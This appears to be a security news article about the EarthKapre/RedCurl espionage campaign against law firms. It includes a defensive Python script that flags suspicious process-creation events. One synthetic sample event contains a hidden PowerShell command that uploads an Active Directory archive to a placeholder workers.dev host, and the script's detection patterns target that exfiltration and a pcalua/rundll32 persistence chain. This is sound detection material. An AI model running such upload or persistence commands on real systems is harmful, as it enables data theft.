EarthKapre Cyber Espionage Targets Law Firms

EarthKapre, known as RedCurl in the cybersecurity world, has recently caught the attention of experts for its sophisticated cyber espionage activities targeting private-sector organizations, specifically law firms and legal services. The discovery of this group by eSentire Threat Response Unit (TRU) in January 2025 has shed light on a complex multi-stage attack strategy tailored for corporate espionage.

The modus operandi of EarthKapre involves luring victims through a meticulously crafted phishing email disguised as a job application from the popular platform Indeed. The email contains a PDF attachment that entices recipients to download a ZIP archive. Within this archive lies a mountable ISO file, which upon opening reveals a seemingly legitimate Adobe executable that serves as the entry point for the next phase of the attack.

What sets EarthKapre apart is its use of DLL side-loading, a technique in which a legitimate, trusted executable (here the Adobe binary from the ISO) is tricked into loading a malicious DLL placed beside it, letting the malware run under the cover of a signed process and evade traditional security controls. Once activated, the malware executes a string decryption function to recover crucial configuration, such as the command-and-control server URL and the AES keys used for encrypted communications. To establish persistence on compromised systems, EarthKapre creates a scheduled task that leverages common Windows tools like pcalua.exe and rundll32.exe, thus ensuring continued control while flying under the radar of conventional security measures.

With persistence secured, the malware proceeds to gather valuable intelligence during the reconnaissance phase. This includes harvesting user credentials, system configurations, disk details, and information on installed antivirus software. The use of SysInternals AD Explorer facilitates data retrieval from Active Directory; the collected data is then archived with password protection before being exfiltrated to a cloud storage service. Exfiltration is carried out with HTTP PUT requests issued from PowerShell, and EarthKapre incorporates Cloudflare Workers into its command-and-control (C2) infrastructure to maintain stealth. However, eSentire researchers have identified a weakness in Cloudflare's free tier that can potentially disrupt the group's operations.
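The two behaviours described above, pcalua.exe proxying rundll32.exe for persistence and PowerShell pushing an archive out with an HTTP PUT, are both visible in ordinary process-creation telemetry. The following is an added example written for this article from a defender's standpoint, not eSentire's detection content: it parses a handful of constructed Sysmon-style process-creation events (an assumed, simplified key=value format using the Event ID 1 field names ParentImage, Image and CommandLine) and flags events matching either behaviour. The DLL name, user names and the `example-placeholder.workers.dev` destination are invented; `workers.dev` itself is the default Cloudflare Workers domain, so matching it is only a hint that the upload may be heading to Workers-hosted C2.

```python
"""Detection logic for the EarthKapre/RedCurl tradecraft described above.

Constructed example, not eSentire's detection content. The sample events are
synthetic, written as key=value pairs (an assumed, simplified format); the field
names ParentImage, Image and CommandLine follow Sysmon Event ID 1 naming.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample events: two benign (0 and 4), three matching the page's tradecraft.
SAMPLE_EVENTS = [
    r'ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe" User=corp\alice',
    r'ParentImage=C:\Windows\System32\pcalua.exe Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe C:\Users\alice\AppData\Local\Temp\netutils.dll,Start" User=corp\alice',
    r'ParentImage=C:\Windows\System32\svchost.exe Image=C:\Windows\System32\pcalua.exe CommandLine="pcalua.exe -a rundll32.exe C:\Users\alice\AppData\Local\Temp\netutils.dll,Start" User=corp\alice',
    r'ParentImage=C:\Windows\System32\rundll32.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell.exe -nop -w hidden Invoke-WebRequest -Method PUT -Uri https://example-placeholder.workers.dev/upload -InFile C:\Users\alice\AppData\Local\Temp\ad.zip" User=corp\alice',
    r'ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell.exe Get-ChildItem C:\temp" User=corp\bob',
]

# key=value pairs; a double-quoted value may contain spaces.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Split one event line into a dict, stripping the quotes around quoted values."""
    return {key: value.strip('"') for key, value in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    """Last path component, lower-cased, accepting Windows or POSIX separators."""
    return re.split(r'[\\/]', path)[-1].lower()


def match_rules(event: Dict[str, str]) -> List[str]:
    """Return the names of the detection rules this event matches (possibly none)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits: List[str] = []

    # Rule 1: rundll32.exe proxied through pcalua.exe, either as its child process
    # or named on the pcalua.exe command line (the scheduled-task persistence on the page).
    if (image == "rundll32.exe" and parent == "pcalua.exe") or (
        image == "pcalua.exe" and re.search(r'\brundll32(\.exe)?\b', cmd, re.I)
    ):
        hits.append("pcalua_proxied_rundll32")

    # Rule 2: PowerShell issuing an HTTP PUT to a URL, i.e. uploading a file outward.
    if image == "powershell.exe" and re.search(r'-Method\s+PUT\b', cmd, re.I) \
            and re.search(r'https?://', cmd, re.I):
        hits.append("powershell_put_upload")
        # Extra tag when the destination is on the default Cloudflare Workers domain.
        if re.search(r'\.workers\.dev\b', cmd, re.I):
            hits.append("cloudflare_workers_destination")

    return hits


def scan(lines) -> List[Tuple[int, List[str]]]:
    """Run every rule over every line; return (line index, matched rules) for hits only."""
    results = []
    for index, line in enumerate(lines):
        hits = match_rules(parse_event(line))
        if hits:
            results.append((index, hits))
    return results


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)}")
```

Both rules key on process ancestry and command-line content rather than on file hashes, so they keep working when the DLL or C2 hostname changes; the IOCs eSentire published are still worth loading as a second, exact-match layer.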

In response to the EarthKapre threat, cybersecurity experts emphasize the importance of educating employees on the perils of phishing emails, particularly those masquerading as job opportunities, and verifying the authenticity of email attachments. Organizations are urged to deploy robust endpoint detection and response (EDR) systems capable of identifying advanced threats and fortifying their defenses. eSentire has also shared indicators of compromise (IOCs) like file hashes and C2 domains to aid in tracking the group’s movements and fortifying against future incursions. These IOCs serve as valuable tools for network monitoring, especially for high-risk sectors such as law firms that are prime targets for this espionage outfit.
